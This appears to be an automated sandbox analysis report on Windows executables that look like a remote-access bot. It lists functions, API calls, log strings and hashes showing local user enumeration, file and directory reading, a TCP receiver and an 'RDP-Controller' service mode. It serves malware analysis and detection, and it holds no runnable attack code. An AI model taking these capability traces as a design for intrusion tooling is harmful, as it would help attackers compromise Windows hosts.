Partial loss of significance (PLOSS), xrefs: 00007FF764CCA719
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF764CCA77D

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
Instruction ID: c0d65386f009d00f39b4522b1f18f8d6048cc9c81a0523d8832d3c95c92612dd
Opcode Fuzzy Hash: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
Instruction Fuzzy Hash: 86F01D66808F84C2D6119F19E4402ABB370FF9E789F605327EBC926664DF2DD542CB10

Function 00007FF764CCA734 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF764CCA78A

Strings

Argument singularity (SIGN), xrefs: 00007FF764CCA734
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF764CCA77D

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
Instruction ID: e42ef280db02da806872f6d116db7b40e47f82fb88522b190aaa0d9fc25d1318
Opcode Fuzzy Hash: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
Instruction Fuzzy Hash: A2F01966808F8482D6119F19E4402ABB370FF9E789F605327EFC82A625DF2DD542CB00

Analysis Process: nju2apmx83wqd9u7namsf59y.exePID: 7028, Parent PID: 6696COMMON

Executed Functions

Function 00007FF679A512FD Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1922981698.00007FF679A51000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF679A50000, based on PE: true

Associated: 0000000A.00000002.1922964275.00007FF679A50000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1923002401.00007FF679A60000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1923002401.00007FF67A05C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1923836547.00007FF67A475000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1923859862.00007FF67A47D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1923859862.00007FF67A47F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1923932950.00007FF67A480000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1923951231.00007FF67A483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff679a50000_nju2apmx83wqd9u7namsf59y.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d92b2e36e32e242d3d26627d8420fc34f18325cbf1fffa5b1655a556a0966707
Instruction ID: ed4072b0d5226e39f7348ab5e04bdd638bdaec0d3c54ad25ecefdd5279ae14f5
Opcode Fuzzy Hash: d92b2e36e32e242d3d26627d8420fc34f18325cbf1fffa5b1655a556a0966707
Instruction Fuzzy Hash: 0CB01233B2528284E3007F02E84167C36607B04700F510070C40C83366CE7D90804710

Analysis Process: main.exePID: 7100, Parent PID: 620COMMON

Execution Graph

Execution Coverage:	5.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	20

Executed Functions

Function 00007FFE0E1638C3 Relevance: 54.6, APIs: 23, Strings: 8, Instructions: 332
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

LocalAlloc.KERNEL32 ref: 00007FFE0E1638F8
wcsncpy.MSVCRT ref: 00007FFE0E163926
LookupAccountNameW.ADVAPI32 ref: 00007FFE0E163983
GetLastError.KERNEL32 ref: 00007FFE0E163995
GetLastError.KERNEL32 ref: 00007FFE0E1639DE
LocalAlloc.KERNEL32 ref: 00007FFE0E163A0D
LookupAccountNameW.ADVAPI32 ref: 00007FFE0E163A49
LocalFree.KERNEL32 ref: 00007FFE0E163A56
GetLastError.KERNEL32 ref: 00007FFE0E163A61

Part of subcall function 00007FFE0E161292: EnterCriticalSection.KERNEL32 ref: 00007FFE0E161363
Part of subcall function 00007FFE0E161292: LeaveCriticalSection.KERNEL32 ref: 00007FFE0E16138B
Part of subcall function 00007FFE0E161292: CopyFileA.KERNEL32 ref: 00007FFE0E1613E8

GetProcessHeap.KERNEL32 ref: 00007FFE0E163D48
HeapAlloc.KERNEL32 ref: 00007FFE0E163D59

Strings

users_sync, xrefs: 00007FFE0E1639A0, 00007FFE0E1639EC, 00007FFE0E163A6C, 00007FFE0E163BBD
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E1638CD, 00007FFE0E163D76
[D] (%s) -> User found(name=%s,s_sid=%s,acct_expires=%x,last_logon=%x), xrefs: 00007FFE0E163BC4
[E] (%s) -> ConvertSidToStringSid failed(gle=%lu), xrefs: 00007FFE0E163BE5
mem_alloc, xrefs: 00007FFE0E1638C6, 00007FFE0E163D6F
D, xrefs: 00007FFE0E163915
sid_to_str, xrefs: 00007FFE0E163BDE
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFE0E1639A7, 00007FFE0E1639F3, 00007FFE0E163A73

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: AllocErrorLastLocal$AccountCriticalHeapLookupNameSection$CopyEnterFileFreeLeaveProcessfflushfwritewcsncpy
String ID: D$[D] (%s) -> User found(name=%s,s_sid=%s,acct_expires=%x,last_logon=%x)$[E] (%s) -> ConvertSidToStringSid failed(gle=%lu)$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$sid_to_str$users_sync
API String ID: 3624467404-104752423
Opcode ID: 77f039575536de71df0d3d15065c23e897c673814d0f2d56dbe4c0034cf1c5e9
Instruction ID: b4581d078a970d0cd9a5627759c46edfbd6e021621805fcb8e1c62a1cddd1150
Opcode Fuzzy Hash: 77f039575536de71df0d3d15065c23e897c673814d0f2d56dbe4c0034cf1c5e9
Instruction Fuzzy Hash: 9DF14862A0CA0386FB608B24E44437963A2EBC4B54F654037D9EE477BADF3DE849D741

Function 00007FF76A901CF3 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNELBASE ref: 00007FF76A901D39
_mbscpy.MSVCRT ref: 00007FF76A901D54
FindFirstFileA.KERNEL32 ref: 00007FF76A901E27
GetLastError.KERNEL32 ref: 00007FF76A901E43
GetLastError.KERNEL32 ref: 00007FF76A901E72
FindClose.KERNEL32 ref: 00007FF76A901E90

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A901D97, 00007FF76A901DCF, 00007FF76A901E07
(resume_handle != NULL), xrefs: 00007FF76A901DF9
(path != NULL), xrefs: 00007FF76A901D89
[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu), xrefs: 00007FF76A901E64
fs_dir_list, xrefs: 00007FF76A901D90, 00007FF76A901DC8, 00007FF76A901E00, 00007FF76A901E5D, 00007FF76A901EA1
(name != NULL), xrefs: 00007FF76A901DC1
[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu), xrefs: 00007FF76A901EA8
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF76A901D82, 00007FF76A901DBA, 00007FF76A901DF2

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Find$ErrorFileLast$CloseFirstNext_mbscpyfflushfwrite
String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
API String ID: 1094913617-243243391
Opcode ID: 45364a4d73fc9ddfc2e4dec663ea98f65a876d62473df77d3cc6ffd341dc3089
Instruction ID: 27f929965639c9b54e04159cc8a4ee8039380fb3ed303c4f89a2f1510f7b11da
Opcode Fuzzy Hash: 45364a4d73fc9ddfc2e4dec663ea98f65a876d62473df77d3cc6ffd341dc3089
Instruction Fuzzy Hash: 3E611925E0D753C6FB217624A4443B8A290AF0239DFF401B6EA5EDB2D0DF2CAD459271

Function 00007FFE11504013 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32 ref: 00007FFE11504059
strcpy.MSVCRT ref: 00007FFE11504074
FindFirstFileA.KERNEL32 ref: 00007FFE11504147
GetLastError.KERNEL32 ref: 00007FFE11504163
GetLastError.KERNEL32 ref: 00007FFE11504192
FindClose.KERNEL32 ref: 00007FFE115041B0

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115040B7, 00007FFE115040EF, 00007FFE11504127
[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu), xrefs: 00007FFE115041C8
(path != NULL), xrefs: 00007FFE115040A9
[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu), xrefs: 00007FFE11504184
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE115040A2, 00007FFE115040DA, 00007FFE11504112
(resume_handle != NULL), xrefs: 00007FFE11504119
fs_dir_list, xrefs: 00007FFE115040B0, 00007FFE115040E8, 00007FFE11504120, 00007FFE1150417D, 00007FFE115041C1
(name != NULL), xrefs: 00007FFE115040E1

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
API String ID: 4253334766-243243391
Opcode ID: 349a579f1b544f04e1e00aaff86d8b417e05fac2448ab09d3faaddd37a340f33
Instruction ID: 171c73539827c5e436fc8f15e25721d1347df5744232bc976b6042d857590928
Opcode Fuzzy Hash: 349a579f1b544f04e1e00aaff86d8b417e05fac2448ab09d3faaddd37a340f33
Instruction Fuzzy Hash: 61617D61F0CE8391FB219BD7A4403BD2A5A6F513B4F4411BADC6E5B2F4DF2CA9458381

Function 00007FFE0E16387F Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE0E16379F: GetProcessHeap.KERNEL32 ref: 00007FFE0E1637E7
Part of subcall function 00007FFE0E16379F: HeapFree.KERNEL32 ref: 00007FFE0E1637F8
Part of subcall function 00007FFE0E16379F: GetProcessHeap.KERNEL32 ref: 00007FFE0E16380C
Part of subcall function 00007FFE0E16379F: HeapFree.KERNEL32 ref: 00007FFE0E16381D
Part of subcall function 00007FFE0E16379F: LocalFree.KERNEL32 ref: 00007FFE0E163831
Part of subcall function 00007FFE0E16379F: LocalFree.KERNEL32 ref: 00007FFE0E163839
Part of subcall function 00007FFE0E16379F: GetProcessHeap.KERNEL32 ref: 00007FFE0E16384D
Part of subcall function 00007FFE0E16379F: HeapFree.KERNEL32 ref: 00007FFE0E16385E

NetApiBufferFree.NETAPI32 ref: 00007FFE0E163D97
NetUserEnum.NETAPI32 ref: 00007FFE0E163E0D
GetProcessHeap.KERNEL32 ref: 00007FFE0E163E4B
HeapAlloc.KERNEL32 ref: 00007FFE0E163E5C
memcpy.MSVCRT ref: 00007FFE0E163E99
GetProcessHeap.KERNEL32 ref: 00007FFE0E163E9E
HeapFree.KERNEL32 ref: 00007FFE0E163EAF

Strings

users_sync, xrefs: 00007FFE0E163EF7, 00007FFE0E163F20, 00007FFE0E164031
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E163EFE
[I] (%s) -> Done(sam_user_num=%u), xrefs: 00007FFE0E164038
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E1638AD
mem_alloc, xrefs: 00007FFE0E1638A6
[E] (%s) -> NetUserEnum failed(enum_err=%08lx), xrefs: 00007FFE0E163F27

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: Heap$Free$Process$Local$AllocBufferEnumUsermemcpy
String ID: [E] (%s) -> Failed(err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> NetUserEnum failed(enum_err=%08lx)$[I] (%s) -> Done(sam_user_num=%u)$mem_alloc$users_sync
API String ID: 1361071942-3382179125
Opcode ID: d8706a7d902b59c164108d338cbc47857dc36c1991d74cbb9efb23a04b1550c3
Instruction ID: dc138e19946267911f03a8b187d85b881c0a002bc9e3293308c104569fd147ad
Opcode Fuzzy Hash: d8706a7d902b59c164108d338cbc47857dc36c1991d74cbb9efb23a04b1550c3
Instruction Fuzzy Hash: 5661B422A0C60795FA209B54F8403BD6361AFC5B54F640137D9EE076F2EE3EE889C311

Function 00007FF76A908C4A Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF76A908C62
strcmp.MSVCRT ref: 00007FF76A908C75
StartServiceCtrlDispatcherA.ADVAPI32 ref: 00007FF76A908CB1
_read.MSVCRT ref: 00007FF76A908D07
GetLastError.KERNEL32 ref: 00007FF76A908D26

Part of subcall function 00007FF76A9088EE: FreeLibrary.KERNEL32(?,?,00000000,000001DE38FB13D0,00007FF76A908CDE,?,?,?,?,?,?,00000001,00007FF76A908E4A,?,?,00007FF76A9184F8), ref: 00007FF76A90892F
Part of subcall function 00007FF76A9088EE: GetProcessHeap.KERNEL32(?,?,00000000,000001DE38FB13D0,00007FF76A908CDE,?,?,?,?,?,?,00000001,00007FF76A908E4A,?,?,00007FF76A9184F8), ref: 00007FF76A908962
Part of subcall function 00007FF76A9088EE: HeapFree.KERNEL32(?,?,00000000,000001DE38FB13D0,00007FF76A908CDE,?,?,?,?,?,?,00000001,00007FF76A908E4A,?,?,00007FF76A9184F8), ref: 00007FF76A908973

Part of subcall function 00007FF76A9089AA: GetProcessHeap.KERNEL32(?,?,00000000,00007FF76A908CE3,?,?,?,?,?,?,00000001,00007FF76A908E4A,?,?,00007FF76A9184F8,00000000), ref: 00007FF76A9089DB
Part of subcall function 00007FF76A9089AA: HeapFree.KERNEL32(?,?,00000000,00007FF76A908CE3,?,?,?,?,?,?,00000001,00007FF76A908E4A,?,?,00007FF76A9184F8,00000000), ref: 00007FF76A9089EC

Strings

main, xrefs: 00007FF76A908D31, 00007FF76A908E0B
service, xrefs: 00007FF76A908C6B, 00007FF76A908CC5
[E] (%s) -> No a valid run mode(mode=%s), xrefs: 00007FF76A908E12
standalone, xrefs: 00007FF76A908C58
[E] (%s) -> StartServiceCtrlDispatcherA failed(GetLastError=%lu), xrefs: 00007FF76A908D38
RDP-Controller, xrefs: 00007FF76A908C82

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Heap$Free$Processstrcmp$CtrlDispatcherErrorLastLibraryServiceStart_read
String ID: RDP-Controller$[E] (%s) -> No a valid run mode(mode=%s)$[E] (%s) -> StartServiceCtrlDispatcherA failed(GetLastError=%lu)$main$service$standalone
API String ID: 3617873859-308889057
Opcode ID: 4e7bd165b9ef87f01e60badb3280077771b19ad4178e97b239a804a1478b891e
Instruction ID: 647be376d933ad978a5b4ab7a8058a81f79dd2244146a468cf540c37e8a36ca2
Opcode Fuzzy Hash: 4e7bd165b9ef87f01e60badb3280077771b19ad4178e97b239a804a1478b891e
Instruction Fuzzy Hash: 89510711F0C703C5FB687724A480379F2A0AF183C4FF495BAD94EC62A2EE5DE9848631

Function 00007FF76A901131 Relevance: 13.6, APIs: 9, Instructions: 120sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,00007FF76A901313), ref: 00007FF76A90116E
_amsg_exit.MSVCRT(?,?,?,00007FF76A901313), ref: 00007FF76A90118D
_initterm.MSVCRT ref: 00007FF76A9011AE
_initterm.MSVCRT ref: 00007FF76A9011D3
SetUnhandledExceptionFilter.KERNEL32(?,?,?,00007FF76A901313), ref: 00007FF76A901212
malloc.MSVCRT ref: 00007FF76A901244
strlen.MSVCRT ref: 00007FF76A90125C
malloc.MSVCRT ref: 00007FF76A901268
_cexit.MSVCRT(?,?,?,00007FF76A901313), ref: 00007FF76A9012E3

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
String ID:
API String ID: 3714283218-0
Opcode ID: 423c7fadebe407afcbf8f11926be5113ac1f50ee7c1d89c8a253cd586a538a4a
Instruction ID: 44276b773091d4bd8e86b2263386fa34bb21b2211f10d483262918f8b195a78a
Opcode Fuzzy Hash: 423c7fadebe407afcbf8f11926be5113ac1f50ee7c1d89c8a253cd586a538a4a
Instruction Fuzzy Hash: BF513C61A08706C9FB56FB15E890279B3A1AF49BC8FB484B9D90DC7391DE3CE8408770

Function 00007FFE0E162A1A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE0E162A42
WSAGetLastError.WS2_32 ref: 00007FFE0E162A5C

Strings

[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE0E162A95
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE0E162A7D
tcp_recv, xrefs: 00007FFE0E162A76, 00007FFE0E162A8E, 00007FFE0E162AB3
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE0E162ABA

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: cb83abf59dcf32c5503ea29b65ae6c5fbd71d82c662421a75d19843cd04b64a0
Instruction ID: cbae33de8d995b60b1cfc85d3e752cc0a42534c24a4539ffcac5814cd261a32d
Opcode Fuzzy Hash: cb83abf59dcf32c5503ea29b65ae6c5fbd71d82c662421a75d19843cd04b64a0
Instruction Fuzzy Hash: 44115E60E0C51792F6205729AD402B913516F45BF4F919333DCFD9AAF7EEACA946C300

Function 00007FF76A902515 Relevance: 72.0, APIs: 24, Strings: 17, Instructions: 298
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fopen.MSVCRT ref: 00007FF76A90255A
fseek.MSVCRT ref: 00007FF76A902579
_errno.MSVCRT ref: 00007FF76A90258D
_errno.MSVCRT ref: 00007FF76A9025A8
_errno.MSVCRT ref: 00007FF76A902667

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

_errno.MSVCRT ref: 00007FF76A902682
_errno.MSVCRT ref: 00007FF76A9026C0
fclose.MSVCRT ref: 00007FF76A902715
_errno.MSVCRT ref: 00007FF76A9027B7
_errno.MSVCRT ref: 00007FF76A9027D2

Strings

[E] (%s) -> fread failed(path=%s,errno=%d), xrefs: 00007FF76A90295B
[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d), xrefs: 00007FF76A90259C
(path != NULL), xrefs: 00007FF76A9025D6
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF76A902759
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF76A9025CF, 00007FF76A902602, 00007FF76A902635
[E] (%s) -> ftell failed(path=%s,errno=%d), xrefs: 00007FF76A9027C6
(buf_sz != NULL), xrefs: 00007FF76A902609
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A9025E4, 00007FF76A902617, 00007FF76A90264A
mem_alloc, xrefs: 00007FF76A90292D
NULL, xrefs: 00007FF76A902ABB
[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d), xrefs: 00007FF76A902890
fs_file_read, xrefs: 00007FF76A902595, 00007FF76A9025DD, 00007FF76A902610, 00007FF76A902643, 00007FF76A90266F, 00007FF76A902752, 00007FF76A9027BF, 00007FF76A902889, 00007FF76A902954, 00007FF76A902A48, 00007FF76A902ACD
[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld), xrefs: 00007FF76A902A4F
(((*buf) == NULL) || ((*buf_sz) > 0)), xrefs: 00007FF76A90263C
[E] (%s) -> fopen failed(path=%s,errno=%d), xrefs: 00007FF76A902676
[I] (%s) -> Done(path=%s,buf_sz=%llu), xrefs: 00007FF76A902AD4
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF76A902934

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: _errno$fclosefflushfopenfseekfwrite
